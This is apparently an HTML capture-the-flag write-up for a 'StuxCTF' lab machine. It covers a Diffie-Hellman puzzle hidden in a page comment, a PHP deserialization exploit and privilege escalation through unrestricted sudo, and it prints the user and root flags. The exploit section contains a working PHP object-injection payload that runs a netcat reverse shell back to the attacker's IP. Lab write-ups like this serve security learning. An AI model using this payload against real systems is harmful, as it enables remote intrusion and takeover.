I"­<blockquote>
  <p>VOiD XD</p>
</blockquote>

<p>My IP : 10.8.253.221
Target IP : 10.10.58.158</p>

<h2 id="port-80-http">PORT 80 [http]</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
&lt;<span class="o">!</span><span class="nt">--</span> The secret directory is...
p: 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251<span class="p">;</span>
g: 7<span class="p">;</span>
a: 330<span class="p">;</span>
b: 450<span class="p">;</span>
g^c: 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617<span class="p">;</span>
		<span class="nt">--</span><span class="o">&gt;</span>

/robots.txt
<span class="c"># robots.txt generated by StuxCTF</span>
<span class="c"># Diffie-Hellman</span>
User-agent: <span class="k">*</span>
Disallow: 
Disallow: /StuxCTF/

Solving it gives : 47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055


   &lt;<span class="o">!</span><span class="nt">--</span> hint: /?file<span class="o">=</span> <span class="nt">--</span><span class="o">&gt;</span>

view-source:http://10.10.58.158/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/index.php?file<span class="o">=</span>index.php

unhex data | rev | <span class="nb">base64</span> <span class="nt">-d</span> file <span class="o">&gt;</span> index.php

</code></pre></div></div>

<p>Solved diffie-Hellman using this script :</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Diffie-Hellman solve script
</span>
<span class="n">p</span><span class="o">=</span><span class="mi">9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251</span>
<span class="n">g</span><span class="o">=</span><span class="mi">7</span>
<span class="n">a</span><span class="o">=</span><span class="mi">330</span>
<span class="n">b</span><span class="o">=</span><span class="mi">450</span>

<span class="n">gc</span> <span class="o">=</span> <span class="mi">6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617</span>


<span class="n">gca</span> <span class="o">=</span> <span class="p">(</span><span class="n">gc</span><span class="o">**</span><span class="n">a</span><span class="p">)</span> <span class="o">%</span> <span class="n">p</span>
<span class="n">gcab</span> <span class="o">=</span> <span class="p">(</span><span class="n">gca</span><span class="o">**</span><span class="n">b</span><span class="p">)</span> <span class="o">%</span> <span class="n">p</span>
 
<span class="k">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">gcab</span><span class="p">)[:</span><span class="mi">128</span><span class="p">])</span>                                                                
</code></pre></div></div>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.tutorialspoint.com/execute_php_online.php

<span class="cp">&lt;?php</span> 
<span class="kd">class</span> <span class="nc">file</span><span class="p">{</span>
	<span class="k">public</span> <span class="nv">$file</span><span class="o">=</span> <span class="s1">'myshell.php'</span><span class="p">;</span>
	<span class="k">public</span> <span class="nv">$data</span> <span class="o">=</span> <span class="s1">'&lt;?php shell_exec("nc -e /bin/bash 10.8.253.221 4444")?&gt;'</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">echo</span> <span class="p">(</span><span class="nb">serialize</span><span class="p">(</span><span class="k">new</span> <span class="nc">file</span><span class="p">));</span>
<span class="cp">?&gt;</span>

</code></pre></div></div>

<p>Gives the exploit</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">O</span><span class="p">:</span><span class="mi">4</span><span class="p">:</span><span class="s">"file"</span><span class="p">:</span><span class="mi">2</span><span class="p">:{</span><span class="n">s</span><span class="p">:</span><span class="mi">4</span><span class="p">:</span><span class="s">"file"</span><span class="p">;</span><span class="n">s</span><span class="p">:</span><span class="mi">9</span><span class="p">:</span><span class="s">"shell.php"</span><span class="p">;</span><span class="n">s</span><span class="p">:</span><span class="mi">4</span><span class="p">:</span><span class="s">"data"</span><span class="p">;</span><span class="n">s</span><span class="p">:</span><span class="mi">69</span><span class="p">:</span><span class="s">"&lt;?php echo "</span><span class="n">Hey</span> <span class="err">!</span><span class="s">"; shell_exec("</span><span class="n">nc</span> <span class="o">-</span><span class="n">e</span> <span class="o">/</span><span class="nb">bin</span><span class="o">/</span><span class="n">bash</span> <span class="mf">10.8</span><span class="p">.</span><span class="mf">253.221</span> <span class="mi">4444</span><span class="s">")?&gt;"</span><span class="p">;}</span> 
</code></pre></div></div>

<h2 id="shell-www-data">Shell [www-data]</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@ubuntu:/home/grecia<span class="nv">$ </span><span class="nb">cat </span>user.txt 
0b6044b7807dd100b9e30f1bd09db53f

www-data@ubuntu:/tmp<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>www-data on ubuntu:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User www-data may run the following commands on ubuntu:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: ALL

root@ubuntu:~# <span class="nb">cat </span>root.txt 
0028454003b42601548df551b738976c

</code></pre></div></div>
:ET